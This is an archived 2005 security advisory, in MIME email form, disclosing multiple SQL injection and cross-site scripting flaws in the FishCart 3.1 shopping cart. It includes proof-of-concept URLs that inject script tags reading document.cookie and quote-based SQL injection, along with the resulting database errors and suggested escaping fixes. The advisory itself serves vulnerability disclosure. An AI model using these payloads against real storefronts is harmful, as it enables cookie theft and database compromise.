fishcartSQLXSS.txt

2005-07-15T00:00:00
ID PACKETSTORM:38719
Type packetstorm
Reporter Diabolic Crab
Modified 2005-07-15T00:00:00

Description

                                        
                                            `  
------=_NextPart_001_005A_01C55049.DEF610F0  
Content-Type: text/plain;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
Dcrab 's Security Advisory  
[Hsc Security Group] http://www.hackerscenter.com/  
[dP Security] http://digitalparadox.org/  
  
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. =  
Learn more at http://www.digitalparadox.org/services.ah  
  
***SPECIAL OFFER***  
Hire my auditing services, if I dont find anything, its FREE..!! =  
http://www.digitalparadox.org/services.ah  
  
Looking for Publishers intrested in my Php Secure Coding Book.  
  
Severity: High  
Title: Multiple SQL injections and XSS in FishCart 3.1  
Date: 4/05/2005  
  
Vendor: FishNet Inc  
Vendor Website: http://www.fishnetinc.com  
Summary: There are, multiple sql injections and xss in fishcart 3.1.  
  
  
Proof of Concept Exploits:=20  
  
http://example.com/demo31/display.php?cartid=3D200505024231092&zid=3D1&li=  
d=3D1&nlst=3D'"><script>alert(document.cookie)</script>&olimit=3D0&cat=3D=  
&key1=3D&psku=3D  
XSS  
  
http://example.com/demo31/display.php?cartid=3D200505024231092&zid=3D1&li=  
d=3D1&nlst=3Dy&olimit=3D0&cat=3D&key1=3D&psku=3D'SQL_INJECTION  
SQL INJECTION  
  
Database error: Invalid SQL: select count(*) as cnt from =  
cvsdemo31prod,cvsdemo31prodlang where nzid=3D1 and nprodsku=3Dprodsku =  
and prodzid=3D1 and nprodsku=3Dprodlsku and prodlzid=3D1 and =  
prodlid=3D1prodsku=3D'''SQL_INJECTION' and prodlsku=3D'''SQL_INJECTION' =  
and prodzid=3D1 and prodzid=3Dprodlzid and prodlid=3D1 and =  
(produseinvq=3D0 or (produseinvq=3D1 and prodinvqty>0))  
MySQL Error: 1054 (Unknown column 'nzid' in 'where clause')  
Session halted.  
  
  
http://example.com/demo31/upstnt.php?zid=3D1&lid=3D1&cartid=3D'SQL_INJECT=  
ION  
SQL INJECTION  
  
Database error: Invalid SQL: select sku,qty from cvsdemo31oline where =  
orderid=3D''SQL_INJECTION'  
MySQL Error: 1064 (You have an error in your SQL syntax near =  
'SQL_INJECTION'' at line 1)  
Session halted.  
  
http://example.com/demo31/upstracking.php?trackingnum=3D'"><script>alert(=  
document.cookie)</script>&reqagree=3Dchecked&m=3D  
XSS  
  
  
http://example.com/demo31/upstracking.php?trackingnum=3D&reqagree=3D'"><s=  
cript>alert(document.cookie)</script>&m=3D  
XSS  
  
http://example.com/demo31/upstracking.php?trackingnum=3D&reqagree=3Dcheck=  
ed&m=3D'"><script>alert(document.cookie)</script>  
XSS  
  
  
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), =  
mysql_real_escape_string() and other functions for input validation =  
before passing user input to the mysql database, or before echoing data =  
on the screen, would solve these problems.  
  
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah  
  
Author:=20  
These vulnerabilities have been found and released by Diabolic Crab, =  
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =  
contact me regarding these vulnerabilities. You can find me at, =  
http://www.hackerscenter.com or http://digitalparadox.org/.  
  
  
  
  
-------------------------------------------------------------------------=  
-------  
  
Sincerely,=20  
Diabolic Crab=20  
  
  
  
------=_NextPart_001_005A_01C55049.DEF610F0  
Content-Type: text/html;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<HTML><HEAD>  
<META http-equiv=3DContent-Type content=3D"text/html; =  
charset=3Diso-8859-1">  
<META content=3D"MSHTML 6.00.2900.2627" name=3DGENERATOR>  
<STYLE></STYLE>  
</HEAD>  
<BODY bgColor=3D#ffffff>  
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR>[Hsc =  
Security Group]=20  
<A =  
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=  
BR>[dP=20  
Security] <A=20  
href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A></FONT>=  
</DIV>  
<DIV> </DIV>  
<DIV><FONT face=3DArial size=3D2>Get Dcrab's Services to audit your Web =  
servers,=20  
scripts, networks, etc. Learn more at <A=20  
href=3D"http://www.digitalparadox.org/services.ah">http://www.digitalpara=  
dox.org/services.ah</A></FONT></DIV>  
<DIV> </DIV>  
<DIV><FONT face=3DArial size=3D2>***SPECIAL OFFER***<BR>Hire my auditing =  
services,=20  
if I dont find anything, its FREE..!! <A=20  
href=3D"http://www.digitalparadox.org/services.ah">http://www.digitalpara=  
dox.org/services.ah</A></FONT></DIV>  
<DIV> </DIV>  
<DIV><FONT face=3DArial size=3D2>Looking for Publishers intrested in my =  
Php Secure=20  
Coding Book.</FONT></DIV>  
<DIV> </DIV>  
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: Multiple SQL =  
injections=20  
and XSS in FishCart 3.1<BR>Date: 4/05/2005</FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>  
<DIV><FONT face=3DArial size=3D2>Vendor: FishNet Inc<BR>Vendor Website: =  
<A=20  
href=3D"http://www.fishnetinc.com">http://www.fishnetinc.com</A><BR>Summa=  
ry: There=20  
are, multiple sql injections and xss in fishcart 3.1.</FONT></DIV>  
<DIV> </DIV><FONT face=3DArial size=3D2>  
<DIV><BR>Proof of Concept Exploits: </DIV>  
<DIV> </DIV>  
<DIV><A=20  
href=3D"http://example.com/demo31/display.php?cartid=3D200505024231092&am=  
p;zid=3D1&lid=3D1&nlst=3D'"><script>alert(document.cookie)</=  
script>&olimit=3D0&cat=3D&key1=3D&psku">http://example.co=  
m/demo31/display.php?cartid=3D200505024231092&zid=3D1&lid=3D1&amp=  
;nlst=3D'"><script>alert(document.cookie)</script>&oli=  
mit=3D0&cat=3D&key1=3D&psku</A>=3D<BR>XSS</DIV>  
<DIV> </DIV>  
<DIV><A=20  
href=3D"http://example.com/demo31/display.php?cartid=3D200505024231092&am=  
p;zid=3D1&lid=3D1&nlst=3Dy&olimit=3D0&cat=3D&key1=3D&=  
amp;psku=3D'SQL_INJECTION">http://example.com/demo31/display.php?cartid=3D=  
200505024231092&zid=3D1&lid=3D1&nlst=3Dy&olimit=3D0&c=  
at=3D&key1=3D&psku=3D'SQL_INJECTION</A><BR>SQL=20  
INJECTION</DIV>  
<DIV> </DIV>  
<DIV>Database error: Invalid SQL: select count(*) as cnt from=20  
cvsdemo31prod,cvsdemo31prodlang where nzid=3D1 and nprodsku=3Dprodsku =  
and prodzid=3D1=20  
and nprodsku=3Dprodlsku and prodlzid=3D1 and =  
prodlid=3D1prodsku=3D'''SQL_INJECTION' and=20  
prodlsku=3D'''SQL_INJECTION' and prodzid=3D1 and prodzid=3Dprodlzid and =  
prodlid=3D1 and=20  
(produseinvq=3D0 or (produseinvq=3D1 and prodinvqty>0))<BR>MySQL =  
Error: 1054=20  
(Unknown column 'nzid' in 'where clause')<BR>Session halted.</DIV>  
<DIV> </DIV>  
<DIV><BR><A=20  
href=3D"http://example.com/demo31/upstnt.php?zid=3D1&lid=3D1&cart=  
id=3D'SQL_INJECTION">http://example.com/demo31/upstnt.php?zid=3D1&lid=  
=3D1&cartid=3D'SQL_INJECTION</A><BR>SQL=20  
INJECTION</DIV>  
<DIV> </DIV>  
<DIV>Database error: Invalid SQL: select sku,qty from cvsdemo31oline =  
where=20  
orderid=3D''SQL_INJECTION'<BR>MySQL Error: 1064 (You have an error in =  
your SQL=20  
syntax near 'SQL_INJECTION'' at line 1)<BR>Session halted.</DIV>  
<DIV> </DIV>  
<DIV><A=20  
href=3D"http://example.com/demo31/upstracking.php?trackingnum=3D'"><=  
script>alert(document.cookie)</script>&reqagree=3Dchecked&m">http=  
://example.com/demo31/upstracking.php?trackingnum=3D'"><script>a=  
lert(document.cookie)</script>&reqagree=3Dchecked&m</A>=3D<=  
BR>XSS</DIV>  
<DIV> </DIV>  
<DIV><BR><A=20  
href=3D"http://example.com/demo31/upstracking.php?trackingnum=3D&reqa=  
gree=3D'"><script>alert(document.cookie)</script>&m">http://exam=  
ple.com/demo31/upstracking.php?trackingnum=3D&reqagree=3D'"><sc=  
ript>alert(document.cookie)</script>&m</A>=3D<BR>XSS</DIV>  
<DIV> </DIV>  
<DIV><A=20  
href=3D"http://example.com/demo31/upstracking.php?trackingnum=3D&reqa=  
gree=3Dchecked&m=3D'"><script>alert(document.cookie)</script">ht=  
tp://example.com/demo31/upstracking.php?trackingnum=3D&reqagree=3Dche=  
cked&m=3D'"><script>alert(document.cookie)</script</A>&gt=  
;<BR>XSS</DIV>  
<DIV> </DIV>  
<DIV><BR>Possible Fixes: The usage of htmlspeacialchars(),=20  
mysql_escape_string(), mysql_real_escape_string() and other functions =  
for input=20  
validation before passing user input to the mysql database, or before =  
echoing=20  
data on the screen, would solve these problems.</DIV>  
<DIV> </DIV>  
<DIV>Keep your self updated, Rss feed at: <A=20  
href=3D"http://digitalparadox.org/rss.ah">http://digitalparadox.org/rss.a=  
h</A></DIV>  
<DIV> </DIV>  
<DIV>Author: <BR>These vulnerabilities have been found and released by =  
Diabolic=20  
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =  
free to=20  
contact me regarding these vulnerabilities. You can find me at, <A=20  
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =  
or <A=20  
href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A>.</DIV>=  
  
<DIV> </DIV>  
<DIV></FONT> </DIV>  
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>  
<DIV>  
<HR>  
<BR>Sincerely, <BR>Diabolic Crab <BR><IMG=20  
src=3D"mhtml:mid://00000083/!http://digitalparadox.org/dc.gif"=20  
border=3D0><BR><BR></DIV></BODY></HTML>  
  
------=_NextPart_001_005A_01C55049.DEF610F0--  
`